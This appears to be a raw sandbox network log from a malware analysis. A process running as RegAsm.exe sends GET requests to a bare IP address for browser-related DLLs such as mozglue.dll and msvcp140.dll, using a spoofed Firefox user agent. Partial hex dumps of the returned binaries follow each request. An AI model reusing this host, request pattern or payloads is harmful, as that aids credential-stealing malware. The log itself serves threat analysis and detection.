2024-09-26 23:49:27 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:27 GMT Content-Type: application/octet-stream Content-Length: 685392 Connection: close Last-Modified: Thursday, 26-Sep-2024 23:49:27 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 23:49:27 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-09-26 23:49:27 UTC	16384	IN	Data Raw: ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f Data Ascii: E}1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x
2024-09-26 23:49:27 UTC	16384	IN	Data Raw: c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
2024-09-26 23:49:27 UTC	16384	IN	Data Raw: 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 Data Ascii: }00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
2024-09-26 23:49:27 UTC	16384	IN	Data Raw: 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
2024-09-26 23:49:27 UTC	16384	IN	Data Raw: 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f Data Ascii: EEPZ}EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w
2024-09-26 23:49:27 UTC	16384	IN	Data Raw: 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
2024-09-26 23:49:28 UTC	16384	IN	Data Raw: 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
2024-09-26 23:49:28 UTC	16384	IN	Data Raw: 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 Data Ascii: 8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
2024-09-26 23:49:28 UTC	16384	IN	Data Raw: 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 Data Ascii: ,0<48%8A)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49722	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:29 UTC	196	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:29 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:29 GMT Content-Type: application/octet-stream Content-Length: 608080 Connection: close Last-Modified: Thursday, 26-Sep-2024 23:49:29 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 23:49:29 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-09-26 23:49:29 UTC	16384	IN	Data Raw: c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 Data Ascii: #H1A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNP
2024-09-26 23:49:29 UTC	16384	IN	Data Raw: ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
2024-09-26 23:49:29 UTC	16384	IN	Data Raw: 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}L
2024-09-26 23:49:29 UTC	16384	IN	Data Raw: 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 Data Ascii: EN1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
2024-09-26 23:49:29 UTC	16384	IN	Data Raw: 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
2024-09-26 23:49:29 UTC	16384	IN	Data Raw: 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$4
2024-09-26 23:49:29 UTC	16384	IN	Data Raw: 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<
2024-09-26 23:49:29 UTC	16384	IN	Data Raw: 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
2024-09-26 23:49:29 UTC	16384	IN	Data Raw: b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49723	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:30 UTC	197	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:31 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:31 GMT Content-Type: application/octet-stream Content-Length: 450024 Connection: close Last-Modified: Thursday, 26-Sep-2024 23:49:31 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
